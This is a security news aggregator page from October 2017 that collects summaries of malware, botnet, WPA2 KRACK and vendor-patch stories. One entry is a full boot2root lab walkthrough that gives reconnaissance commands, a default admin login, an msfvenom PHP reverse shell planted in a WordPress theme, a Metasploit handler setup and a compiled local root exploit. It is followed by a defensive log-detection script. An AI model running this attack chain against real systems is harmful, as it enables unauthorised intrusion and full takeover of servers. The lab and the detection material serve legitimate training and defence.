Feed aggregator

New Rapidly-Growing IoT Botnet Threatens to Take Down the Internet

News from 'The Hackers News' - 15 hours 19 min ago
Just a year after Mirai—the biggest IoT-based malware, which caused vast Internet outages by launching massive DDoS attacks—completed its first anniversary, security researchers are now warning of a brand new, rapidly growing IoT botnet. Dubbed 'IoT_reaper' and first spotted in September by researchers at the firm Qihoo 360, the new malware no longer depends on cracking weak passwords; instead, it exploits
Categories: Cyber India

MacOS Proton backdoor delivered via Trojanized media player app

News from 'Help Net Security' - Sat, 21/Oct/2017 - 01:26
A Trojanized version of Elmedia Player software for Mac was available for download for who knows how long from the developer’s official site, ESET researchers have found. The threat: The compromised package was made to deliver the newest version of the Proton backdoor. After gaining persistence on a victim’s system, the malware is able to hoover up OS and browser information (history, cookies, bookmarks, login data, etc.); SSH, GnuPG, 1Password, and macOS keychain data; VPN …
Categories: Cyber India

EU MEPs want stronger privacy rules for Internet-enabled communication services

News from 'Help Net Security' - Fri, 20/Oct/2017 - 23:10
With 31 votes for, 24 against and one abstention, the European Parliament Committee on Civil Liberties, Justice and Home Affairs (LIBE) has backed new privacy protections for EU citizens. The approved draft proposals would apply to SMS and telephone services, as well as Internet-enabled services and electronic communication tools such as WhatsApp, Skype, Messenger and Facebook. The Committee also wants “cookie walls” to be banned, and the prohibition of snooping on personal devices via cookies …
Categories: Cyber India

New infosec products of the week: October 20, 2017

News from 'Help Net Security' - Fri, 20/Oct/2017 - 20:00
Ransomware protection intercepts threats targeting enterprise data: FileCloud announced FileCloud Breach Intercept, which offers ransomware protection. FileCloud offers branding and customization tools, allowing you to set your own policies, and design your own emails and alerts. Customized emails and UX reduce spoofing risk as hackers can’t run a mass spoofing unless they have an exact copy of an email from one of your employees. Nfusion 2 provides stronger misattribution environments for online investigation: Ntrepid announced …
Categories: Cyber India

The complex digital life of the modern family: Online safety and privacy concerns

News from 'Help Net Security' - Fri, 20/Oct/2017 - 19:30
The National Cyber Security Alliance (NCSA) conducted a study to better understand teens and parents’ attitudes, concerns and knowledge base about online safety and privacy and how they view their own responsibility to keep themselves safe while on the Internet. The issue of fake news: Almost 50 percent of teens said they were “very” or “somewhat” concerned about mistakenly spreading fake news or misinformation over the Internet. Over 60 percent of parents indicated they were …
Categories: Cyber India

Can it be true? Most consumers value security more than convenience

News from 'Help Net Security' - Fri, 20/Oct/2017 - 19:00
52 percent of UK consumers think fraud is an inevitable part of shopping online, according to Paysafe, a global payments provider. What are the top three challenges of identifying, managing and protecting against fraud across different payment methods? Security or convenience? In a wake-up call for online business, this research contradicts the widely-held belief that consumers value convenience and experience over security when shopping online. Instead, 60 percent of consumers are willing to accept any …
Categories: Cyber India

Ubuntu 17.10 brings enhanced security and productivity for developers

News from 'Help Net Security' - Fri, 20/Oct/2017 - 18:30
Canonical released Ubuntu 17.10 featuring a new GNOME desktop on Wayland, and new versions of KDE, MATE and Budgie. On the cloud, 17.10 brings Kubernetes 1.8 for hyper-elastic container operations, and minimal base images for containers. Enhanced security and productivity for developers: The Atom editor and Microsoft Visual Studio Code are emerging as the new wave of popular development tools, and both are available across all supported releases of Ubuntu including 16.04 LTS and 17.10. …
Categories: Cyber India

Unpatched Microsoft Word DDE Exploit Being Used In Widespread Malware Attacks

News from 'The Hackers News' - Fri, 20/Oct/2017 - 15:37
A newly discovered, unpatched attack method that exploits a built-in feature of Microsoft Office is currently being used in various widespread malware attack campaigns. Last week we reported how hackers could leverage an old Microsoft Office feature called Dynamic Data Exchange (DDE) to perform malicious code execution on the targeted device without requiring Macros enabled or memory
Categories: Cyber India

Google wants bug hunters to probe popular Android apps for bugs

News from 'Help Net Security' - Fri, 20/Oct/2017 - 06:35
Google has started another bug bounty initiative: the Google Play Security Reward Program. While the name of the program might suggest that bug hunters will be after vulnerabilities in Google’s official Android app market, in reality they will be asked to unearth bugs in all of Google’s apps available on Google Play, as well as a short list of other popular ones. Currently in scope are the Alibaba, Dropbox, Duolingo, Headspace, Line, Snapchat, Mail.Ru, and …
Categories: Cyber India

Samsung to Give Linux Desktop Experience to Smartphone Users

News from 'TechNewsWorld' - Fri, 20/Oct/2017 - 04:58
Samsung on Thursday announced a new app, Linux on Galaxy, designed to work with its DeX docking station to bring a full Linux desktop experience to Galaxy Note8, Galaxy S8 and S8+ smartphone users. Samsung earlier this year introduced DeX, a docking station that connects to a monitor to give Galaxy smartphone users a desktop experience. With the Linux on Galaxy app, users will be able to run full Linux desktop distributions. The ability to run a Linux environment is "interesting at best," said Jitesh Ubrani, senior research analyst at IDC.
Categories: Cyber India

Cisco plugs WPA2 holes, critical Cloud Services Platform flaw

News from 'Help Net Security' - Fri, 20/Oct/2017 - 01:15
Cisco has released updates to address vulnerabilities in a wide variety of its products. Among these are updates fixing the WPA2 vulnerabilities that can be exploited in the newly unveiled KRACK attacks, as well as a critical vulnerability affecting the company’s Cloud Services Platform. The WPA2 flaws: Cisco is still working on finishing the list of its products that are affected by one or more of the ten vulnerabilities affecting WPA and WPA2 discovered by …
Categories: Cyber India

Google Play Store Launches Bug Bounty Program to Protect Popular Android Apps

News from 'The Hackers News' - Thu, 19/Oct/2017 - 23:59
Better late than never. Google has finally launched a bug bounty program for Android apps on Google Play Store, inviting security researchers to find and report vulnerabilities in some of the most popular Android apps. Dubbed "Google Play Security Reward," the bug bounty program offers security researchers the chance to work directly with Android app developers to find and fix vulnerabilities in their
Categories: Cyber India

Business suffers as over-zealous security tools block legitimate work

News from 'Help Net Security' - Thu, 19/Oct/2017 - 23:30
Most security teams utilise a ‘prohibition approach’ – i.e. restricting user access to websites and applications – a tactic which is hampering productivity and innovation while creating major frustration for users, according to research conducted by Vanson Bourne. “At a time when competition is fierce, the risk of falling behind and being less productive is as big a risk to an enterprise as cyberattacks. Security has to enable innovation by design, not act as a …
Categories: Cyber India

Apple, GE Join Forces on Industrial IoT Apps

News from 'TechNewsWorld' - Thu, 19/Oct/2017 - 22:27
Apple and General Electric on Wednesday announced a new SDK for iOS that enables developers to create applications for Predix, an Internet of Things platform made by GE. Applications developed with the new SDK could give industrial operators more insight and visibility into the performance of their equipment and operations on an iPhone or iPad. For example, a worker who was notified of a problem by phone would be able to check it out immediately and even collaborate with others on the scene to address the problem.
Categories: Cyber India

KRACK Demo: Critical Key Reinstallation Attack Against Widely-Used WPA2 Wi-Fi Protocol

News from 'The Hackers News' - Thu, 19/Oct/2017 - 22:13
Do you think your wireless network is secure because you're using WPA2 encryption? If yes, think again! Security researchers have discovered several key management vulnerabilities in the core of the Wi-Fi Protected Access II (WPA2) protocol that could allow an attacker to hack into your Wi-Fi network and eavesdrop on the Internet communications. WPA2 is a 13-year-old WiFi authentication scheme
Categories: Cyber India

Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

News from 'Hacking Articles' - Thu, 19/Oct/2017 - 21:23

BTRSys is a boot2root challenge developed by ‘ismailonderkaya’ in the BTRSys series. This is an amazing lab for practice which covers every technique.

Difficulty level: Intermediate

WalkThrough

Let’s start by finding our target. For that, use the following command:

netdiscover

Our target is 192.168.0.106, so run nmap against it to learn which ports and services are open. Use the following command:

nmap -A 192.168.0.106

From the nmap output you can see that ports 21, 22 and 80 are open, running FTP, SSH and HTTP respectively. As we still have a lot to find out about this target, we decided to use DIRB. Dirb is a web scanner, i.e. it scans the whole web application for files and directories, including hidden ones. Use the following command:

dirb http://192.168.0.106

Using dirb we found various files and directories such as robots.txt, upload, etc. The output also shows that the target web application is using WordPress, so we can run a WordPress scan that covers themes, plugins and users with the following command:

./wpscan.rb -u http://192.168.0.106/wordpress/ --enumerate at --enumerate ap --enumerate u

As a result we have found two users – btrisk and admin.

Now if you log in as admin using the password admin, you get access to the dashboard. Once you have that access, you can execute malicious PHP code there to obtain a meterpreter session. Use the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command will give you PHP code which you have to execute. Copy the code from <?php to die(); and paste it into the template.

Once the code is uploaded, execute it through the URL as shown:

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before executing the above URL, make sure that your meterpreter handler is active. To do so, go to Metasploit and type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 4444

exploit

Once the handler is active and the URL is executed, you will have your session. Let’s check the information of the system we have entered; for this type:

sysinfo

Now let’s get into shell by simply typing:

shell

Through the shell we came to know that the Ubuntu version is 16.04.2, and fortunately there is an exploit in exploit-db for this version of Ubuntu. Download this exploit.

This exploit will help you achieve privilege escalation so that you can directly access root. Once the exploit is downloaded, we need to compile it, and for that type:

gcc 41458.c -o rootshell

Now that the exploit has been compiled, upload it to the /tmp directory. For that you will need to change to the /tmp directory. Use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now go to the shell, change to /tmp, give permissions to the rootshell exploit and then execute it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

And to confirm use the following command:

whoami

HURRAY!!!! We are in the root. And so our Boot2Root challenge is complete.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the BTRSys: v2.1 VM (Boot2Root Challenge) appeared first on Hacking Articles.

Categories: Cyber India
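
Seen from the defender's side, the theme-template step in the walkthrough above leaves a recognisable trail in the web server's access log: a POST to the WordPress theme editor followed by a direct request to a theme PHP file. The following Python detector is an added example, not part of the original post; the log lines are constructed, and the Apache combined log format, the `wp-admin/theme-editor.php` editor path and the 30-minute correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format (not from the original post).
SAMPLE_LOG = """\
192.168.0.107 - - [19/Oct/2017:21:01:10 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
192.168.0.107 - - [19/Oct/2017:21:03:42 +0000] "POST /wordpress/wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
192.168.0.50 - - [19/Oct/2017:21:04:00 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.0.107 - - [19/Oct/2017:21:05:07 +0000] "GET /wordpress/wp-content/themes/twentyfourteen/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.0.50 - - [20/Oct/2017:09:00:00 +0000] "GET /wordpress/wp-content/themes/twentyfourteen/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, timestamp, HTTP method, request path
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" \d{3}')
# Assumed path of the WordPress admin theme editor.
EDITOR = re.compile(r'/wp-admin/theme-editor\.php')
# Any .php file under a theme directory, with or without a query string.
THEME_PHP = re.compile(r'/wp-content/themes/[^?]+\.php(?:\?|$)')
WINDOW = timedelta(minutes=30)  # assumed correlation window


def find_theme_shell_activity(log_text, window=WINDOW):
    """Return (ip, path, correlated) for each direct request to a theme PHP file.

    correlated is True when the same client POSTed to the theme editor
    within `window` before the request.
    """
    last_edit = {}  # client IP -> time of its last theme editor POST
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, path = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and EDITOR.search(path):
            last_edit[ip] = when
        elif THEME_PHP.search(path):
            # Theme templates are normally included by WordPress itself,
            # so a direct request to one is unusual on its own.
            edited = last_edit.get(ip)
            correlated = edited is not None and when - edited <= window
            alerts.append((ip, path, correlated))
    return alerts


if __name__ == "__main__":
    for alert in find_theme_shell_activity(SAMPLE_LOG):
        print(alert)
```

An alert with the correlated flag set is the stronger signal; uncorrelated direct requests to theme PHP files are still worth reviewing, since the edit may have happened outside the window or through another channel.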

Millions download botnet-building malware from Google Play

News from 'Help Net Security' - Thu, 19/Oct/2017 - 20:47
Researchers have discovered a new batch of malicious apps on Google Play, some of which have been downloaded and installed on some 2.6 million devices. The apps’ capabilities: The apps posed as legitimate offerings that modify the look of the characters in Minecraft: Pocket Edition (PE). In the background, though, they set out to rope the devices into a botnet. Once they were installed on a target device, they would connect to a C&C server, …
Categories: Cyber India

Another KRACK in the network perimeter

News from 'Help Net Security' - Thu, 19/Oct/2017 - 19:30
When a high profile vulnerability surfaces that is as far reaching as KRACK, a WPA2 encryption attack to hijack Wi-Fi networks, it’s common to respond impulsively. “Why are people using outdated technologies?” or “Why aren’t people patching their software?” While easy to blame the protocols and the people involved, it gets us nowhere. Every breach gets the same treatment. If we’re ever going to get out of this infinite loop, we need a fundamentally different …
Categories: Cyber India

Most organizations don’t have SSH security policies in place

News from 'Help Net Security' - Thu, 19/Oct/2017 - 19:15
Cybercriminals can abuse SSH keys to secure and automate administrator-to-machine and machine-to-machine access to critical business functions. According to Venafi’s research, even though SSH keys provide the highest levels of administrative access they are routinely untracked, unmanaged and poorly secured. For example, 63 percent of respondents admit they do not actively rotate keys, even when an administrator leaves their organization, allowing them to have ongoing privileged access to critical systems. “A compromised SSH key in …
Categories: Cyber India

Enterprise container security: There’s room for improvement

News from 'Help Net Security' - Thu, 19/Oct/2017 - 19:00
With companies such as Facebook, Netflix and Google heralding the use of containers for their agility, portability, and cost benefits – enterprises are following suit. But the introduction of new processes and changes to infrastructure require a significant shift in focus. To learn the current state of container security in the enterprise, Aqua Security surveyed 512 individuals meeting the criteria of using containers in development or production today, or planning to use them in the …
Categories: Cyber India